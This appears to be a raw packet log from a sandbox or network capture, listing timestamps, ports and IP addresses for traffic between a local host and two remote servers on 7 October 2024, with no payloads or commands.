Oct 7, 2024 03:15:37.731663942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731676102 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731697083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731717110 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731734037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731746912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731765032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731786013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731813908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731816053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731849909 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731864929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731882095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731900930 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731915951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731931925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731950045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731966972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.731983900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.731998920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732017994 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732033014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732050896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732067108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732083082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732100010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732116938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732131958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732148886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732168913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732182980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732198954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732217073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732233047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732249022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732266903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732281923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732297897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732335091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732373953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732426882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732429028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732462883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732481003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732496023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732512951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732531071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732546091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732564926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.732580900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.732614994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.753391981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753494024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753547907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753580093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.753598928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753619909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.753633976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753659010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.753667116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753680944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.753700972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753715992 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.753736019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753753901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.753768921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753788948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.753802061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753818035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.753835917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753851891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.753868103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753884077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.753902912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753917933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.753937006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753952026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.753972054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.753987074 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.754019022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.762970924 CEST	443	49819	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.763170004 CEST	443	49820	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.763632059 CEST	49819	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.763645887 CEST	443	49819	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.763691902 CEST	49820	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.763725042 CEST	443	49820	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.764085054 CEST	49819	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.764091015 CEST	443	49819	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.764308929 CEST	49820	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.764316082 CEST	443	49820	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.792467117 CEST	443	49821	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.796535969 CEST	49821	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.796588898 CEST	443	49821	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.797091961 CEST	49821	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.797101021 CEST	443	49821	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.797367096 CEST	443	49818	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.797611952 CEST	443	49818	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.797679901 CEST	49818	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.797888041 CEST	49818	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.797909021 CEST	443	49818	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.797924042 CEST	49818	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.797931910 CEST	443	49818	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.800584078 CEST	49823	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.800626993 CEST	443	49823	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.800717115 CEST	49823	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.800940990 CEST	49823	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:37.800955057 CEST	443	49823	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:37.805315018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805371046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805449009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.805474997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805527925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805530071 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.805562019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805583000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.805610895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.805613041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805646896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805663109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.805679083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805694103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.805711985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805728912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.805744886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805759907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.805778980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805810928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805815935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.805843115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.805843115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805860996 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.805876017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805902958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.805911064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.805932045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.805963039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.819026947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.819139004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.819217920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.819240093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.819252968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.819283009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.819284916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.819319963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.819319963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.819344997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.819354057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.819371939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.819406033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.819466114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.819782019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.819813967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.819847107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.819865942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.819880009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.819920063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.819974899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820005894 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820056915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820063114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820108891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820115089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820148945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820159912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820179939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820199013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820225000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820250034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820300102 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820346117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820394039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820394993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820429087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820442915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820461988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820477009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820493937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820511103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820527077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820542097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820559978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820574999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820597887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820609093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820631981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820647955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820661068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820678949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820693970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820709944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820728064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820743084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820760012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820775032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820794106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820806980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820826054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820843935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820861101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820875883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820888996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820910931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820923090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820935011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820956945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.820971966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.820990086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821007967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821023941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821042061 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821057081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821078062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821089983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821103096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821137905 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821417093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821471930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821475029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821504116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821522951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821537018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821548939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821574926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821588039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821626902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821626902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821676016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821679115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821713924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821729898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821764946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821764946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821798086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821835041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821841955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821867943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821887970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821921110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821926117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821954012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.821970940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.821999073 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822005987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822038889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822052956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822076082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822088003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822107077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822124958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822140932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822150946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822190046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822192907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822227001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822276115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822278023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822310925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822328091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822360992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822364092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822411060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822412968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822463989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822491884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822546005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822546959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822597980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822597980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822645903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822674990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822679996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822690010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822724104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822729111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822762966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822781086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822792053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822812080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822839022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822843075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822894096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822895050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822926998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822945118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822959900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.822974920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.822997093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823008060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823030949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823045015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823061943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823080063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823095083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823110104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823127985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823143959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823162079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823179960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823194027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823216915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823229074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823242903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823262930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823292971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823314905 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823327065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823350906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823358059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823390007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823407888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823409081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823441982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823474884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823493004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823524952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823528051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823576927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823597908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823632002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823647022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823666096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823682070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823698997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.823714972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.823792934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.844475985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.844506979 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.844558954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.844580889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.844614983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.844624043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:37.844649076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:37.844664097 CEST	49782	80	192.168.2.5	95.164.90.97
